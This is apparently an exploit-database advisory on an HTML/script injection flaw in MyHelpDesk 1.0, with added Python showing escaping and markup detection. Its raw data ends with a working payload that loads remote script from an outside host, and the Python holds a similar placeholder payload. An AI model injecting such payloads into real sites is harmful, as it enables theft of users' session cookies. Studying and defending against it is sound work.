Vendor: MyHelpDesk
By: Alper
CVSS: 7.5 (HIGH)
Vulnerability Type: HTML Injection
CWE: 79
Product Name: MyHelpDesk
Affected Version From: MyHelpDesk 1.0
Affected Version To: MyHelpDesk 1.0
Patch Exists: NO
Related CWE: N/A
CPE: MyHelpDesk
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

MyHelpDesk HTML Injection Vulnerability

MyHelpDesk does not properly sanitize HTML tags from form fields. Attackers may pass arbitrary HTML and script code through the unsanitized form fields or through parameters specified via URL. The attacker-supplied HTML code will be executed by the web client of users who visit such pages, in the security context of the site running the vulnerable software. This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users.

Mitigation:

Input validation should be used to ensure that user-supplied data does not contain malicious HTML or script code.
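An added illustration of that mitigation, not code from MyHelpDesk or the advisory: a Python rendering of a help-desk ticket row with the unsanitized "before" beside the entity-encoded "after", plus a simple check that flags form or URL values carrying tag markup so they can be logged. The field names, template, payload and host are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample input: a form field and a URL query string carrying the
# kind of markup the advisory describes (placeholder host, not a real one).
PAYLOAD = '<script src="http://example.invalid/f.js">Alper</script>'
FORM_FIELDS = {"subject": PAYLOAD, "body": "Printer on floor 2 is offline"}
QUERY_STRING = "user=Alper&subject=%3Cscript%3EAlper%3C%2Fscript%3E"

# Hypothetical ticket-list row; the real application's markup is not on the page.
TEMPLATE = "<tr><td>{subject}</td><td>{body}</td></tr>"

# A tag opener: '<' followed directly by an optional '/' and a letter or '!'.
# Plain text such as "a < b" does not match, which keeps the check low-noise.
MARKUP_RE = re.compile(r"</?[a-zA-Z!]")


def contains_markup(value: str) -> bool:
    """Flag values that carry a tag opener, for logging or alerting. This is a
    detection aid, not the defence: encoding at output is what stops injection."""
    return MARKUP_RE.search(value) is not None


def render_unsafe(fields: dict) -> str:
    """Mirrors the vulnerable behaviour: field values dropped into the page as-is."""
    return TEMPLATE.format(**fields)


def render_safe(fields: dict) -> str:
    """Hardened form: every value is HTML-entity encoded before it reaches the page,
    so the browser shows the text instead of interpreting it as markup."""
    return TEMPLATE.format(**{k: html.escape(v, quote=True) for k, v in fields.items()})


def fields_from_query(qs: str) -> dict:
    """Parameters supplied via URL get exactly the same treatment as form fields."""
    return {k: v[0] for k, v in parse_qs(qs).items()}


def audit(fields: dict) -> list:
    """Names of the fields whose values a reviewer would want logged."""
    return [name for name, value in fields.items() if contains_markup(value)]


if __name__ == "__main__":
    print(render_unsafe(FORM_FIELDS))   # script tag lands in the page intact
    print(render_safe(FORM_FIELDS))     # '&lt;script src=&quot;...' : inert text
    print(audit(FORM_FIELDS))           # ['subject']
    url_subject = fields_from_query(QUERY_STRING)["subject"]
    print(render_safe({"subject": url_subject, "body": ""}))
```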

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4967/info

It has been reported that MyHelpDesk is vulnerable to HTML injection attacks.

MyHelpDesk does not properly sanitize HTML tags from form fields. Attackers may pass arbitrary HTML and script code through the unsanitized form fields or through parameters specified via URL. The attacker-supplied HTML code will be executed by the web client of users who visit such pages, in the security context of the site running the vulnerable software.

This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users.

<script src="http://forum.olympos.org/f.js">Alper</script>